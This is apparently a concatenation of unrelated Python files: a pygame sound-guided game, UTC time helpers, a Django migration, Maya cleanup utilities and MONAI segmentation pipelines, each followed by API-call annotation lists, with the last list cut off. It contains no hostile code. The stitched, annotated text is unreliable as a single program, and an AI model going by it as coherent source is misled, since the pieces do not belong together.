        elif event.key == pygame.K_UP and user_y_pos >= AV_SIZE:
            user_y_pos -= AV_SIZE
        elif event.key == pygame.K_DOWN and user_y_pos < WIN_Y - AV_SIZE:
            user_y_pos += AV_SIZE
    return user_x_pos, user_y_pos
def calculate_difference(win_position:tuple, user_x_pos:int, user_y_pos:int):
    """Return a normalised distance score between avatar and target.

    The Chebyshev-style per-axis distances are combined into a Euclidean
    distance, divided by the window diagonal (so the ratio lies in [0, 1])
    and square-rooted again to flatten the curve near the target.
    """
    dx = abs(win_position[0] - user_x_pos)
    dy = abs(win_position[1] - user_y_pos)
    return np.sqrt(np.sqrt(dx**2 + dy**2) / DIFF_MAX)
def main():
    """Run the 'find the hidden target by sound' game.

    A random note plays whose volume grows as the avatar (moved with the
    arrow keys) gets closer to an invisible target cell; the cell turns
    yellow when hit.  The note is re-rolled roughly once per second.
    """
    # setup
    pygame.init()
    pygame.midi.init()
    player = pygame.midi.Output(0)
    player.set_instrument(0)
    # Random MIDI note between C4 (60) and C6 (84).
    current_note = random.randint(60,84)
    window = pygame.display.set_mode((WIN_X,WIN_Y))
    # Avatar starts at the window centre; target at a random grid cell.
    user_x_pos, user_y_pos = int(WIN_X/2), int(WIN_Y/2)
    pos_x = [ii for ii in range(0,WIN_X-AV_SIZE,AV_SIZE)]
    pos_y = [ii for ii in range(0,WIN_Y-AV_SIZE,AV_SIZE)]
    win_position = (random.choice(pos_x), random.choice(pos_y))
    difference = calculate_difference(win_position, user_x_pos, user_y_pos)
    # Velocity scales with closeness: 0 far away, 127 on top of the target.
    player.note_on(current_note, int(127*(1-difference)))
    old_time = time.time()
    # program loop
    running = True
    while running:
        # Yellow background signals the target was found; white otherwise.
        if win_position == (user_x_pos, user_y_pos):
            window.fill((255,255,0))
        else:
            window.fill((255,255,255))
        difference = calculate_difference(win_position, user_x_pos, user_y_pos)
        pygame.draw.rect(window,(0,50,255,50),(user_x_pos,user_y_pos,AV_SIZE,AV_SIZE)) # Rect(left, top, width, height)
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            user_x_pos, user_y_pos = adapt_avatar_position(event, user_x_pos, user_y_pos)
        pygame.display.flip() # Documentation: Update the full display Surface to the screen
        # Once per second: swap to a fresh random note at the current volume.
        if time.time()-old_time > 1:
            player.note_off(current_note)
            current_note = random.randint(60,84)
            player.note_on(current_note, int(127*(1-difference)))
            old_time = time.time()
    # teardown
    del player
    pygame.midi.quit()
# Start the game when executed as a script.
if __name__=="__main__":
    main()
"random.choice",
"numpy.sqrt",
"pygame.init",
"pygame.midi.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.display.flip",
"pygame.midi.init",
"pygame.draw.rect",
"pygame.midi.Output",
"time.time",
"random.randint"
] | [((200, 232), 'numpy.sqrt', 'np.sqrt', (['(WIN_X ** 2 + WIN_Y ** 2)'], {}), '(WIN_X ** 2 + WIN_Y ** 2)\n', (207, 232), True, 'import numpy as np\n'), ((1126, 1139), 'pygame.init', 'pygame.init', ([], {}), '()\n', (1137, 1139), False, 'import pygame\n'), ((1145, 1163), 'pygame.midi.init', 'pygame.midi.init', ([], {}), '()\n', (1161, 1163), False, 'import pygame\n'), ((1177, 1198), 'pygame.midi.Output', 'pygame.midi.Output', (['(0)'], {}), '(0)\n', (1195, 1198), False, 'import pygame\n'), ((1247, 1269), 'random.randint', 'random.randint', (['(60)', '(84)'], {}), '(60, 84)\n', (1261, 1269), False, 'import random\n'), ((1287, 1326), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(WIN_X, WIN_Y)'], {}), '((WIN_X, WIN_Y))\n', (1310, 1326), False, 'import pygame\n'), ((1719, 1730), 'time.time', 'time.time', ([], {}), '()\n', (1728, 1730), False, 'import time\n'), ((2705, 2723), 'pygame.midi.quit', 'pygame.midi.quit', ([], {}), '()\n', (2721, 2723), False, 'import pygame\n'), ((1520, 1540), 'random.choice', 'random.choice', (['pos_x'], {}), '(pos_x)\n', (1533, 1540), False, 'import random\n'), ((1542, 1562), 'random.choice', 'random.choice', (['pos_y'], {}), '(pos_y)\n', (1555, 1562), False, 'import random\n'), ((2022, 2112), 'pygame.draw.rect', 'pygame.draw.rect', (['window', '(0, 50, 255, 50)', '(user_x_pos, user_y_pos, AV_SIZE, AV_SIZE)'], {}), '(window, (0, 50, 255, 50), (user_x_pos, user_y_pos, AV_SIZE,\n AV_SIZE))\n', (2038, 2112), False, 'import pygame\n'), ((2158, 2176), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (2174, 2176), False, 'import pygame\n'), ((2350, 2371), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (2369, 2371), False, 'import pygame\n'), ((1039, 1087), 'numpy.sqrt', 'np.sqrt', (['(difference[0] ** 2 + difference[1] ** 2)'], {}), '(difference[0] ** 2 + difference[1] ** 2)\n', (1046, 1087), True, 'import numpy as np\n'), ((2543, 2565), 'random.randint', 'random.randint', (['(60)', '(84)'], {}), '(60, 
84)\n', (2557, 2565), False, 'import random\n'), ((2654, 2665), 'time.time', 'time.time', ([], {}), '()\n', (2663, 2665), False, 'import time\n'), ((2448, 2459), 'time.time', 'time.time', ([], {}), '()\n', (2457, 2459), False, 'import time\n')] |
# coding=utf-8
from __future__ import unicode_literals, absolute_import
from datetime import datetime
from pytz import UTC
from dateutil.parser import parse
# Plain timestamp layout, no timezone marker (apparently unused by the
# helpers below -- kept for external callers).
fmt = '%Y-%m-%d %H:%M:%S'
# ISO 8601 UTC layout used by isotime().
utc_fmt = "%Y-%m-%dT%H:%M:%SZ"
def get_utcnow():
    """Return the current moment as a timezone-aware UTC datetime."""
    now = datetime.utcnow()
    return now.replace(tzinfo=UTC)
def isotime(at=None):
    """Stringify time in ISO 8601 format (UTC, e.g. ``2020-01-01T00:00:00Z``).

    :param at: datetime to format; defaults to now.  Naive datetimes are
        assumed to already represent UTC; aware ones are converted to UTC.
    """
    if not at:
        at = datetime.utcnow()
    if not at.tzinfo:  # naive: assume it is already UTC
        # Bug fix: datetime.replace returns a *new* object; the original code
        # discarded the result, leaving the datetime naive.  (strftime output
        # was unaffected, but the intent was an aware UTC value.)
        at_utc = at.replace(tzinfo=UTC)
    else:  # aware: convert to UTC
        at_utc = at.astimezone(UTC)
    return at_utc.strftime(utc_fmt)
def parse_timestr(timestr):
    """Parse an arbitrary timestamp string into a datetime via dateutil."""
    parsed = parse(timestr)
    return parsed
| [
"dateutil.parser.parse",
"datetime.datetime.utcnow"
] | [((243, 260), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (258, 260), False, 'from datetime import datetime\n'), ((639, 653), 'dateutil.parser.parse', 'parse', (['timestr'], {}), '(timestr)\n', (644, 653), False, 'from dateutil.parser import parse\n'), ((403, 420), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (418, 420), False, 'from datetime import datetime\n')] |
# Generated by Django 2.2.4 on 2020-02-08 02:22
from django.db import migrations
def move_batch_fks(apps, schema_editor):
    """Backfill the new ``CIPRSRecord.batch`` foreign key.

    Stamps every record reachable from a batch's ``records`` relation with
    that batch, then assigns the earliest batch to any record still left
    without one.
    """
    Batch = apps.get_model("petition", "Batch")
    CIPRSRecord = apps.get_model("petition", "CIPRSRecord")
    for batch in Batch.objects.all():
        print(f"Adding batch {batch.pk} to {batch.records.count()} records")
        batch.records.update(batch=batch)
    # Fallback for orphaned records: the oldest batch by primary key.
    fallback_batch = Batch.objects.order_by("pk").first()
    for record in CIPRSRecord.objects.all():
        if not record.batch:
            record.batch = fallback_batch
            record.save()
class Migration(migrations.Migration):
    """Data migration: populate CIPRSRecord.batch from existing batch links."""

    dependencies = [
        ("petition", "0007_auto_20200208_0221"),
    ]

    # NOTE(review): no reverse_code is given, so this migration is
    # irreversible -- confirm that is acceptable.
    operations = [migrations.RunPython(move_batch_fks)]
| [
"django.db.migrations.RunPython"
] | [((721, 757), 'django.db.migrations.RunPython', 'migrations.RunPython', (['move_batch_fks'], {}), '(move_batch_fks)\n', (741, 757), False, 'from django.db import migrations\n')] |
import maya.cmds as mc
import os
import logging
# Attach a default stderr handler so log output is visible inside Maya.
logging.basicConfig()
# Module-level logger shared by the helper functions below.
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
def isNewScene():
    """
    Checks whether the open scene file is still untitled (never saved).
    :rtype: bool
    """
    scene_name = mc.file(query=True, sceneName=True)
    return len(scene_name) == 0
def isSaveRequired():
    """
    Checks whether the open scene file has unsaved modifications.
    :rtype: bool
    """
    has_changes = mc.file(query=True, modified=True)
    return has_changes
def currentFilePath():
    """
    Retrieves the normalized path of the open scene file.
    Returns an empty string for an untitled (never saved) scene.
    :rtype: str
    """
    # Guard clause: an untitled scene has no path to report.
    if isNewScene():
        return ''
    return os.path.normpath(mc.file(query=True, sceneName=True))
def currentFilename():
    """
    Retrieves just the file name portion of the open scene's path.
    :rtype: str
    """
    # basename(p) is equivalent to os.path.split(p)[1].
    return os.path.basename(currentFilePath())
def currentDirectory():
    """
    Retrieves just the directory portion of the open scene's path.
    :rtype: str
    """
    # dirname(p) is equivalent to os.path.split(p)[0].
    return os.path.dirname(currentFilePath())
def removeUserAttributes():
    """
    Strips every user-defined attribute from the currently selected nodes
    (e.g. attributes carried over through an FBX round trip).
    :rtype: None
    """
    for nodeName in mc.ls(sl=True):
        # listAttr returns None when the node has no user attributes.
        userAttrs = mc.listAttr(nodeName, userDefined=True) or []
        for attrName in userAttrs:
            log.info('Removing "%s.%s" attribute.' % (nodeName, attrName))
            mc.deleteAttr('%s.%s' % (nodeName, attrName))
def unloadTurtlePlugin():
    """
    Unloads the Turtle plugin and purges its leftovers (nodes, undo
    entries, shelf) from the open scene file.
    :rtype: None
    """
    # Bail out early when the plugin was never loaded.
    if not mc.pluginInfo('Turtle', query=True, loaded=True):
        log.info('Could not locate "Turtle" in the open scene file.')
        return
    # Delete every node belonging to a Turtle-registered node type.
    for turtleType in mc.pluginInfo('Turtle', query=True, dependNode=True):
        turtleNodes = mc.ls(type=turtleType)
        if not turtleNodes:
            continue
        # Turtle nodes may be locked, so unlock before deleting.
        mc.lockNode(turtleNodes, lock=False)
        mc.delete(turtleNodes)
    # Drop undo entries that could still reference the deleted nodes.
    mc.flushUndo()
    # Remove the TURTLE shelf tab if it was installed.
    if mc.shelfLayout('TURTLE', query=True, exists=True):
        log.info('Removing "TURTLE" from the shelf tab!')
        mc.deleteUI('TURTLE', layout=True)
    # Finally unload the plugin itself.
    mc.unloadPlugin('Turtle')
def resetWindowPositions():
    """
    Snaps every open Maya window back to the screen's top-left corner
    (useful after a monitor-layout change strands windows off-screen).
    :rtype: None
    """
    for windowName in mc.lsUI(windows=True):
        log.info('Resetting "%s" window...' % windowName)
        mc.window(windowName, edit=True, topLeftCorner=[0, 0])
def resetStartupCameras():
    """
    Restores the home position on the three orthographic startup cameras.
    :rtype: None
    """
    for cameraName in ('top', 'front', 'side'):
        mc.viewSet(cameraName, home=True)
| [
"logging.basicConfig",
"logging.getLogger",
"maya.cmds.delete",
"maya.cmds.ls",
"maya.cmds.window",
"maya.cmds.flushUndo",
"maya.cmds.deleteUI",
"maya.cmds.viewSet",
"maya.cmds.shelfLayout",
"maya.cmds.lsUI",
"maya.cmds.deleteAttr",
"maya.cmds.file",
"maya.cmds.unloadPlugin",
"maya.cmds.lo... | [((49, 70), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (68, 70), False, 'import logging\n'), ((77, 104), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (94, 104), False, 'import logging\n'), ((457, 491), 'maya.cmds.file', 'mc.file', ([], {'query': '(True)', 'modified': '(True)'}), '(query=True, modified=True)\n', (464, 491), True, 'import maya.cmds as mc\n'), ((1325, 1339), 'maya.cmds.ls', 'mc.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (1330, 1339), True, 'import maya.cmds as mc\n'), ((1912, 1960), 'maya.cmds.pluginInfo', 'mc.pluginInfo', (['"""Turtle"""'], {'query': '(True)', 'loaded': '(True)'}), "('Turtle', query=True, loaded=True)\n", (1925, 1960), True, 'import maya.cmds as mc\n'), ((2143, 2195), 'maya.cmds.pluginInfo', 'mc.pluginInfo', (['"""Turtle"""'], {'query': '(True)', 'dependNode': '(True)'}), "('Turtle', query=True, dependNode=True)\n", (2156, 2195), True, 'import maya.cmds as mc\n'), ((2555, 2569), 'maya.cmds.flushUndo', 'mc.flushUndo', ([], {}), '()\n', (2567, 2569), True, 'import maya.cmds as mc\n'), ((2616, 2665), 'maya.cmds.shelfLayout', 'mc.shelfLayout', (['"""TURTLE"""'], {'query': '(True)', 'exists': '(True)'}), "('TURTLE', query=True, exists=True)\n", (2630, 2665), True, 'import maya.cmds as mc\n'), ((2800, 2825), 'maya.cmds.unloadPlugin', 'mc.unloadPlugin', (['"""Turtle"""'], {}), "('Turtle')\n", (2815, 2825), True, 'import maya.cmds as mc\n'), ((3020, 3041), 'maya.cmds.lsUI', 'mc.lsUI', ([], {'windows': '(True)'}), '(windows=True)\n', (3027, 3041), True, 'import maya.cmds as mc\n'), ((3344, 3372), 'maya.cmds.viewSet', 'mc.viewSet', (['"""top"""'], {'home': '(True)'}), "('top', home=True)\n", (3354, 3372), True, 'import maya.cmds as mc\n'), ((3377, 3407), 'maya.cmds.viewSet', 'mc.viewSet', (['"""front"""'], {'home': '(True)'}), "('front', home=True)\n", (3387, 3407), True, 'import maya.cmds as mc\n'), ((3412, 3441), 'maya.cmds.viewSet', 'mc.viewSet', (['"""side"""'], 
{'home': '(True)'}), "('side', home=True)\n", (3422, 3441), True, 'import maya.cmds as mc\n'), ((1451, 1490), 'maya.cmds.listAttr', 'mc.listAttr', (['nodeName'], {'userDefined': '(True)'}), '(nodeName, userDefined=True)\n', (1462, 1490), True, 'import maya.cmds as mc\n'), ((2292, 2312), 'maya.cmds.ls', 'mc.ls', ([], {'type': 'nodeType'}), '(type=nodeType)\n', (2297, 2312), True, 'import maya.cmds as mc\n'), ((2457, 2491), 'maya.cmds.lockNode', 'mc.lockNode', (['nodeNames'], {'lock': '(False)'}), '(nodeNames, lock=False)\n', (2468, 2491), True, 'import maya.cmds as mc\n'), ((2500, 2520), 'maya.cmds.delete', 'mc.delete', (['nodeNames'], {}), '(nodeNames)\n', (2509, 2520), True, 'import maya.cmds as mc\n'), ((2734, 2768), 'maya.cmds.deleteUI', 'mc.deleteUI', (['"""TURTLE"""'], {'layout': '(True)'}), "('TURTLE', layout=True)\n", (2745, 2768), True, 'import maya.cmds as mc\n'), ((3145, 3199), 'maya.cmds.window', 'mc.window', (['windowName'], {'edit': '(True)', 'topLeftCorner': '[0, 0]'}), '(windowName, edit=True, topLeftCorner=[0, 0])\n', (3154, 3199), True, 'import maya.cmds as mc\n'), ((262, 297), 'maya.cmds.file', 'mc.file', ([], {'query': '(True)', 'sceneName': '(True)'}), '(query=True, sceneName=True)\n', (269, 297), True, 'import maya.cmds as mc\n'), ((682, 717), 'maya.cmds.file', 'mc.file', ([], {'query': '(True)', 'sceneName': '(True)'}), '(query=True, sceneName=True)\n', (689, 717), True, 'import maya.cmds as mc\n'), ((1668, 1713), 'maya.cmds.deleteAttr', 'mc.deleteAttr', (["('%s.%s' % (nodeName, attrName))"], {}), "('%s.%s' % (nodeName, attrName))\n", (1681, 1713), True, 'import maya.cmds as mc\n')] |
import sys
import numpy as np
import torch
from monai import transforms, data
from ..data import DataModule, ReadImaged, Renamed, Inferer
###################################
# Transform
###################################
def wmh_train_transform(
    spacing=(1.0, 1.0, 1.0), spatial_size=(128, 128, 128), num_patches=1
):
    """Build the MONAI training pipeline for the WMH dataset.

    The pipeline loads image/label pairs, keeps only label class 1 as a
    binary mask, resamples to ``spacing``, extracts ``num_patches`` random
    patches of ``spatial_size`` and applies spatial/intensity
    augmentations.
    """
    steps = [
        ReadImaged(["image", "label"]),
        # Keep only class 1 as a binary float mask.
        transforms.Lambdad("label", lambda x: (x == 1).astype(np.float32)),
        transforms.AddChanneld("label"),
        transforms.CropForegroundd(["image", "label"], source_key="image"),
        transforms.NormalizeIntensityd("image", channel_wise=True),
        transforms.Spacingd(
            ["image", "label"], pixdim=spacing, mode=("bilinear", "bilinear"),
        ),
        transforms.SpatialPadd(["image", "label"], spatial_size=spatial_size),
        # Patch sampling balanced between foreground and background.
        transforms.RandCropByPosNegLabeld(
            ["image", "label"],
            label_key="label",
            spatial_size=spatial_size,
            pos=1,
            neg=1,
            num_samples=num_patches,
            image_key="image",
            image_threshold=0,
        ),
        # Spatial augmentations.
        transforms.RandAffined(
            ["image", "label"],
            prob=0.15,
            spatial_size=spatial_size,
            rotate_range=[30 * np.pi / 180] * 3,
            scale_range=[0.3] * 3,
            mode=("bilinear", "bilinear"),
            as_tensor_output=False,
        ),
        transforms.RandFlipd(["image", "label"], prob=0.5, spatial_axis=0),
        transforms.RandFlipd(["image", "label"], prob=0.5, spatial_axis=1),
        transforms.RandFlipd(["image", "label"], prob=0.5, spatial_axis=2),
        # Intensity augmentations.
        transforms.RandGaussianNoised("image", prob=0.15, std=0.1),
        transforms.RandGaussianSmoothd(
            "image",
            prob=0.15,
            sigma_x=(0.5, 1.5),
            sigma_y=(0.5, 1.5),
            sigma_z=(0.5, 1.5),
        ),
        transforms.RandScaleIntensityd("image", prob=0.15, factors=0.3),
        transforms.RandShiftIntensityd("image", prob=0.15, offsets=0.1),
        transforms.RandAdjustContrastd("image", prob=0.15, gamma=(0.7, 1.5)),
        # Re-binarize the label after interpolation.
        transforms.AsDiscreted("label", threshold=0.5),
        transforms.ToTensord(["image", "label"]),
        Renamed(),
    ]
    return transforms.Compose(steps)
def wmh_val_transform():
    """Build the MONAI validation pipeline for the WMH dataset.

    No resampling or augmentation is applied; the label may be absent
    (``allow_missing_keys=True``), e.g. for unlabeled cases.
    """
    steps = [
        ReadImaged(["image", "label"], allow_missing_keys=True),
        # Keep only class 1 as a binary float mask.
        transforms.Lambdad(
            "label",
            lambda x: (x == 1).astype(np.float32),
            allow_missing_keys=True,
        ),
        transforms.AddChanneld("label", allow_missing_keys=True),
        transforms.NormalizeIntensityd(
            "image", nonzero=True, channel_wise=True
        ),
        transforms.ToTensord(["image", "label"], allow_missing_keys=True),
        Renamed(),
    ]
    return transforms.Compose(steps)
def wmh_test_transform():
    """Return the test pipeline (identical to the validation pipeline)."""
    return wmh_val_transform()
def wmh_vis_transform(spacing=(1.0, 1.0, 1.0)):
    """Build the MONAI visualization pipeline for the WMH dataset.

    Like the validation pipeline, but resamples both keys to ``spacing``
    (nearest-neighbour interpolation for the label).
    """
    steps = [
        ReadImaged(["image", "label"], allow_missing_keys=True),
        # Keep only class 1 as a binary float mask.
        transforms.Lambdad(
            "label",
            lambda x: (x == 1).astype(np.float32),
            allow_missing_keys=True,
        ),
        transforms.AddChanneld("label", allow_missing_keys=True),
        transforms.NormalizeIntensityd("image", channel_wise=True),
        transforms.Spacingd(
            keys=["image", "label"],
            pixdim=spacing,
            mode=("bilinear", "nearest"),
        ),
        transforms.ToTensord(["image", "label"], allow_missing_keys=True),
        Renamed(),
    ]
    return transforms.Compose(steps)
###################################
# Data module
###################################
class WMHDataModule(DataModule):
    """Data module for the WMH dataset.

    Wires the ``wmh_*_transform`` pipelines defined above into cached
    datasets; train, validation and test splits all use
    ``monai.data.CacheDataset`` with the same caching parameters.
    """

    def __init__(
        self,
        data_properties,
        spacing=(1.0, 1.0, 1.0),
        spatial_size=(128, 128, 128),
        num_patches=1,
        num_splits=5,
        split=0,
        batch_size=2,
        num_workers=None,
        cache_num=sys.maxsize,
        cache_rate=1.0,
        progress=True,
        copy_cache=True,
        seed=42,
    ):
        """Configure transforms and dataset classes, then delegate to
        :class:`DataModule`.

        ``cache_num``/``cache_rate``/``progress``/``copy_cache`` are
        forwarded to ``CacheDataset``; the remaining arguments are passed
        through to the base class or to the transform builders.
        """
        # Keyword arguments shared by the CacheDataset of every split.
        dataset_cls_params = {
            "cache_num": cache_num,
            "cache_rate": cache_rate,
            "num_workers": num_workers,
            "progress": progress,
            "copy_cache": copy_cache,
        }
        # (dataset class, kwargs) pair consumed by the DataModule base —
        # presumably instantiated lazily per split; TODO confirm against
        # the base class.
        dataset_cls = (data.CacheDataset, dataset_cls_params)
        train_transform = wmh_train_transform(
            spacing, spatial_size, num_patches
        )
        val_transform = wmh_val_transform()
        test_transform = wmh_test_transform()
        vis_transform = wmh_vis_transform(spacing)
        super().__init__(
            data_properties,
            train_dataset_cls=dataset_cls,
            val_dataset_cls=dataset_cls,
            test_dataset_cls=dataset_cls,
            train_transform=train_transform,
            val_transform=val_transform,
            test_transform=test_transform,
            vis_transform=vis_transform,
            num_splits=num_splits,
            split=split,
            batch_size=batch_size,
            num_workers=num_workers,
            seed=seed,
        )
# Short alias so configurations can refer to the data module simply as WMH.
WMH = WMHDataModule
###################################
# Inference
###################################
class WMHInferer(Inferer):
    """Inferer for WMH segmentation models.

    The ``post`` argument selects how raw network outputs are
    post-processed:

    - ``"logit"``: keep raw logits (default output dtype float32).
    - ``"prob"``: apply a sigmoid to obtain probabilities (float32).
    - ``"class"``: threshold logits at 0 to obtain a binary mask (uint8).
    - any other value (e.g. ``None`` or a ready-made transform) is
      forwarded to the base class unchanged.

    An explicitly supplied ``output_dtype`` always takes precedence over
    the per-mode default.
    """

    def __init__(
        self,
        spacing=(1.0, 1.0, 1.0),
        spatial_size=(128, 128, 128),
        post=None,
        write_dir=None,
        output_dtype=None,
        **kwargs,
    ) -> None:
        # Map the symbolic post-processing names onto concrete transforms.
        # (The original code had a redundant `else: post = post` branch,
        # removed here; unrecognized values simply pass through.)
        if post == "logit":
            post = transforms.Lambdad("input", lambda x: x)
            output_dtype = np.float32 if output_dtype is None else output_dtype
        elif post == "prob":
            post = transforms.Lambdad("input", torch.sigmoid)
            output_dtype = np.float32 if output_dtype is None else output_dtype
        elif post == "class":
            # sigmoid(x) >= 0.5 is equivalent to x >= 0, so threshold logits.
            post = transforms.Lambdad("input", lambda x: x >= 0)
            output_dtype = np.uint8 if output_dtype is None else output_dtype
        super().__init__(
            spacing=spacing,
            spatial_size=spatial_size,
            post=post,
            write_dir=write_dir,
            output_dtype=output_dtype,
            **kwargs,
        )
| [
"monai.transforms.CropForegroundd",
"monai.transforms.RandScaleIntensityd",
"monai.transforms.NormalizeIntensityd",
"monai.transforms.RandShiftIntensityd",
"monai.transforms.RandAdjustContrastd",
"monai.transforms.Spacingd",
"monai.transforms.AddChanneld",
"monai.transforms.RandGaussianNoised",
"mon... | [((2309, 2344), 'monai.transforms.Compose', 'transforms.Compose', (['train_transform'], {}), '(train_transform)\n', (2327, 2344), False, 'from monai import transforms, data\n'), ((2924, 2957), 'monai.transforms.Compose', 'transforms.Compose', (['val_transform'], {}), '(val_transform)\n', (2942, 2957), False, 'from monai import transforms, data\n'), ((3728, 3761), 'monai.transforms.Compose', 'transforms.Compose', (['vis_transform'], {}), '(vis_transform)\n', (3746, 3761), False, 'from monai import transforms, data\n'), ((477, 508), 'monai.transforms.AddChanneld', 'transforms.AddChanneld', (['"""label"""'], {}), "('label')\n", (499, 508), False, 'from monai import transforms, data\n'), ((518, 584), 'monai.transforms.CropForegroundd', 'transforms.CropForegroundd', (["['image', 'label']"], {'source_key': '"""image"""'}), "(['image', 'label'], source_key='image')\n", (544, 584), False, 'from monai import transforms, data\n'), ((594, 652), 'monai.transforms.NormalizeIntensityd', 'transforms.NormalizeIntensityd', (['"""image"""'], {'channel_wise': '(True)'}), "('image', channel_wise=True)\n", (624, 652), False, 'from monai import transforms, data\n'), ((662, 752), 'monai.transforms.Spacingd', 'transforms.Spacingd', (["['image', 'label']"], {'pixdim': 'spacing', 'mode': "('bilinear', 'bilinear')"}), "(['image', 'label'], pixdim=spacing, mode=('bilinear',\n 'bilinear'))\n", (681, 752), False, 'from monai import transforms, data\n'), ((781, 850), 'monai.transforms.SpatialPadd', 'transforms.SpatialPadd', (["['image', 'label']"], {'spatial_size': 'spatial_size'}), "(['image', 'label'], spatial_size=spatial_size)\n", (803, 850), False, 'from monai import transforms, data\n'), ((860, 1044), 'monai.transforms.RandCropByPosNegLabeld', 'transforms.RandCropByPosNegLabeld', (["['image', 'label']"], {'label_key': '"""label"""', 'spatial_size': 'spatial_size', 'pos': '(1)', 'neg': '(1)', 'num_samples': 'num_patches', 'image_key': '"""image"""', 'image_threshold': '(0)'}), 
"(['image', 'label'], label_key='label',\n spatial_size=spatial_size, pos=1, neg=1, num_samples=num_patches,\n image_key='image', image_threshold=0)\n", (893, 1044), False, 'from monai import transforms, data\n'), ((1153, 1358), 'monai.transforms.RandAffined', 'transforms.RandAffined', (["['image', 'label']"], {'prob': '(0.15)', 'spatial_size': 'spatial_size', 'rotate_range': '([30 * np.pi / 180] * 3)', 'scale_range': '([0.3] * 3)', 'mode': "('bilinear', 'bilinear')", 'as_tensor_output': '(False)'}), "(['image', 'label'], prob=0.15, spatial_size=\n spatial_size, rotate_range=[30 * np.pi / 180] * 3, scale_range=[0.3] * \n 3, mode=('bilinear', 'bilinear'), as_tensor_output=False)\n", (1175, 1358), False, 'from monai import transforms, data\n'), ((1453, 1519), 'monai.transforms.RandFlipd', 'transforms.RandFlipd', (["['image', 'label']"], {'prob': '(0.5)', 'spatial_axis': '(0)'}), "(['image', 'label'], prob=0.5, spatial_axis=0)\n", (1473, 1519), False, 'from monai import transforms, data\n'), ((1529, 1595), 'monai.transforms.RandFlipd', 'transforms.RandFlipd', (["['image', 'label']"], {'prob': '(0.5)', 'spatial_axis': '(1)'}), "(['image', 'label'], prob=0.5, spatial_axis=1)\n", (1549, 1595), False, 'from monai import transforms, data\n'), ((1605, 1671), 'monai.transforms.RandFlipd', 'transforms.RandFlipd', (["['image', 'label']"], {'prob': '(0.5)', 'spatial_axis': '(2)'}), "(['image', 'label'], prob=0.5, spatial_axis=2)\n", (1625, 1671), False, 'from monai import transforms, data\n'), ((1681, 1739), 'monai.transforms.RandGaussianNoised', 'transforms.RandGaussianNoised', (['"""image"""'], {'prob': '(0.15)', 'std': '(0.1)'}), "('image', prob=0.15, std=0.1)\n", (1710, 1739), False, 'from monai import transforms, data\n'), ((1749, 1863), 'monai.transforms.RandGaussianSmoothd', 'transforms.RandGaussianSmoothd', (['"""image"""'], {'prob': '(0.15)', 'sigma_x': '(0.5, 1.5)', 'sigma_y': '(0.5, 1.5)', 'sigma_z': '(0.5, 1.5)'}), "('image', prob=0.15, sigma_x=(0.5, 1.5),\n 
sigma_y=(0.5, 1.5), sigma_z=(0.5, 1.5))\n", (1779, 1863), False, 'from monai import transforms, data\n'), ((1940, 2003), 'monai.transforms.RandScaleIntensityd', 'transforms.RandScaleIntensityd', (['"""image"""'], {'prob': '(0.15)', 'factors': '(0.3)'}), "('image', prob=0.15, factors=0.3)\n", (1970, 2003), False, 'from monai import transforms, data\n'), ((2013, 2076), 'monai.transforms.RandShiftIntensityd', 'transforms.RandShiftIntensityd', (['"""image"""'], {'prob': '(0.15)', 'offsets': '(0.1)'}), "('image', prob=0.15, offsets=0.1)\n", (2043, 2076), False, 'from monai import transforms, data\n'), ((2086, 2154), 'monai.transforms.RandAdjustContrastd', 'transforms.RandAdjustContrastd', (['"""image"""'], {'prob': '(0.15)', 'gamma': '(0.7, 1.5)'}), "('image', prob=0.15, gamma=(0.7, 1.5))\n", (2116, 2154), False, 'from monai import transforms, data\n'), ((2164, 2210), 'monai.transforms.AsDiscreted', 'transforms.AsDiscreted', (['"""label"""'], {'threshold': '(0.5)'}), "('label', threshold=0.5)\n", (2186, 2210), False, 'from monai import transforms, data\n'), ((2220, 2260), 'monai.transforms.ToTensord', 'transforms.ToTensord', (["['image', 'label']"], {}), "(['image', 'label'])\n", (2240, 2260), False, 'from monai import transforms, data\n'), ((2642, 2698), 'monai.transforms.AddChanneld', 'transforms.AddChanneld', (['"""label"""'], {'allow_missing_keys': '(True)'}), "('label', allow_missing_keys=True)\n", (2664, 2698), False, 'from monai import transforms, data\n'), ((2708, 2780), 'monai.transforms.NormalizeIntensityd', 'transforms.NormalizeIntensityd', (['"""image"""'], {'nonzero': '(True)', 'channel_wise': '(True)'}), "('image', nonzero=True, channel_wise=True)\n", (2738, 2780), False, 'from monai import transforms, data\n'), ((2812, 2877), 'monai.transforms.ToTensord', 'transforms.ToTensord', (["['image', 'label']"], {'allow_missing_keys': '(True)'}), "(['image', 'label'], allow_missing_keys=True)\n", (2832, 2877), False, 'from monai import transforms, data\n'), 
((3335, 3391), 'monai.transforms.AddChanneld', 'transforms.AddChanneld', (['"""label"""'], {'allow_missing_keys': '(True)'}), "('label', allow_missing_keys=True)\n", (3357, 3391), False, 'from monai import transforms, data\n'), ((3401, 3459), 'monai.transforms.NormalizeIntensityd', 'transforms.NormalizeIntensityd', (['"""image"""'], {'channel_wise': '(True)'}), "('image', channel_wise=True)\n", (3431, 3459), False, 'from monai import transforms, data\n'), ((3469, 3564), 'monai.transforms.Spacingd', 'transforms.Spacingd', ([], {'keys': "['image', 'label']", 'pixdim': 'spacing', 'mode': "('bilinear', 'nearest')"}), "(keys=['image', 'label'], pixdim=spacing, mode=(\n 'bilinear', 'nearest'))\n", (3488, 3564), False, 'from monai import transforms, data\n'), ((3616, 3681), 'monai.transforms.ToTensord', 'transforms.ToTensord', (["['image', 'label']"], {'allow_missing_keys': '(True)'}), "(['image', 'label'], allow_missing_keys=True)\n", (3636, 3681), False, 'from monai import transforms, data\n'), ((5761, 5801), 'monai.transforms.Lambdad', 'transforms.Lambdad', (['"""input"""', '(lambda x: x)'], {}), "('input', lambda x: x)\n", (5779, 5801), False, 'from monai import transforms, data\n'), ((5930, 5972), 'monai.transforms.Lambdad', 'transforms.Lambdad', (['"""input"""', 'torch.sigmoid'], {}), "('input', 